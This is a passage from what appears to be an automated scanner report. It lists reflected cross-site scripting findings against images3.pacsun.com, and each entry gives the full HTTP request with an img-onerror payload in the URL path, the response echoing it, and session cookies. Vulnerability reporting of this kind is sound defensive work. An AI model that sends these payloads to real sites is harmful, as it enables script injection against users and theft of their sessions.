Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8886004_sw_5168c474<img src=a onerror=alert(1)>6ecf10dfb31

3.240. http://images3.pacsun.com/is/image/pacsunproducts/8898025_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8898025_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a was submitted in the REST URL parameter 4. This input was echoed as 790d9<img src=a onerror=alert(1)>6d991b1fd4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8898025_01790d9<img%20src%3da%20onerror%3dalert(1)>6d991b1fd4a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8898025_01790d9<img src=a onerror=alert(1)>6d991b1fd4a

3.241. http://images3.pacsun.com/is/image/pacsunproducts/8902629_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4 was submitted in the REST URL parameter 4. This input was echoed as 626be<img src=a onerror=alert(1)>47c850577d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8902629_01_001626be<img%20src%3da%20onerror%3dalert(1)>47c850577d4?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8902629_01_001626be<img src=a onerror=alert(1)>47c850577d4

3.242. http://images3.pacsun.com/is/image/pacsunproducts/8902629_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a was submitted in the REST URL parameter 4. This input was echoed as ad2b5<img src=a onerror=alert(1)>17205cea70a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8902629_sw_001ad2b5<img%20src%3da%20onerror%3dalert(1)>17205cea70a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8902629_sw_001ad2b5<img src=a onerror=alert(1)>17205cea70a

3.243. http://images3.pacsun.com/is/image/pacsunproducts/8902629_sw_048 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8902629_sw_048

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008 was submitted in the REST URL parameter 4. This input was echoed as 9b2fe<img src=a onerror=alert(1)>b6120455008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8902629_sw_0489b2fe<img%20src%3da%20onerror%3dalert(1)>b6120455008?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8902629_sw_0489b2fe<img src=a onerror=alert(1)>b6120455008

3.244. http://images3.pacsun.com/is/image/pacsunproducts/8904468_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8904468_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a was submitted in the REST URL parameter 4. This input was echoed as 52787<img src=a onerror=alert(1)>d1e2b34e36a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8904468_0152787<img%20src%3da%20onerror%3dalert(1)>d1e2b34e36a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8904468_0152787<img src=a onerror=alert(1)>d1e2b34e36a

3.245. http://images3.pacsun.com/is/image/pacsunproducts/8905895_01_031 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8905895_01_031

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7 was submitted in the REST URL parameter 4. This input was echoed as bdbd8<img src=a onerror=alert(1)>91425f070a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8905895_01_031bdbd8<img%20src%3da%20onerror%3dalert(1)>91425f070a7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8905895_01_031bdbd8<img src=a onerror=alert(1)>91425f070a7

3.246. http://images3.pacsun.com/is/image/pacsunproducts/8912289_01_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_01_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58 was submitted in the REST URL parameter 4. This input was echoed as b9971<img src=a onerror=alert(1)>788fd8aed58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8912289_01_041b9971<img%20src%3da%20onerror%3dalert(1)>788fd8aed58?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_01_041b9971<img src=a onerror=alert(1)>788fd8aed58

3.247. http://images3.pacsun.com/is/image/pacsunproducts/8912289_sw_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1 was submitted in the REST URL parameter 4. This input was echoed as 7c120<img src=a onerror=alert(1)>cbc595904a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8912289_sw_0407c120<img%20src%3da%20onerror%3dalert(1)>cbc595904a1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_sw_0407c120<img src=a onerror=alert(1)>cbc595904a1

3.248. http://images3.pacsun.com/is/image/pacsunproducts/8912289_sw_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8912289_sw_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb was submitted in the REST URL parameter 4. This input was echoed as f8496<img src=a onerror=alert(1)>8febe2ef8cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8912289_sw_041f8496<img%20src%3da%20onerror%3dalert(1)>8febe2ef8cb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8912289_sw_041f8496<img src=a onerror=alert(1)>8febe2ef8cb

3.249. http://images3.pacsun.com/is/image/pacsunproducts/8913964_01_054 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_01_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168 was submitted in the REST URL parameter 4. This input was echoed as a31a2<img src=a onerror=alert(1)>2d612f92168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8913964_01_054a31a2<img%20src%3da%20onerror%3dalert(1)>2d612f92168?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8913964_01_054a31a2<img src=a onerror=alert(1)>2d612f92168

3.250. http://images3.pacsun.com/is/image/pacsunproducts/8913964_sw_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_sw_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656 was submitted in the REST URL parameter 4. This input was echoed as 8189d<img src=a onerror=alert(1)>c965a8f7656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8913964_sw_0048189d<img%20src%3da%20onerror%3dalert(1)>c965a8f7656?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8913964_sw_0048189d<img src=a onerror=alert(1)>c965a8f7656

3.251. http://images3.pacsun.com/is/image/pacsunproducts/8913964_sw_054 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8913964_sw_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2 was submitted in the REST URL parameter 4. This input was echoed as a4224<img src=a onerror=alert(1)>8c9adb198c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8913964_sw_054a4224<img%20src%3da%20onerror%3dalert(1)>8c9adb198c2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
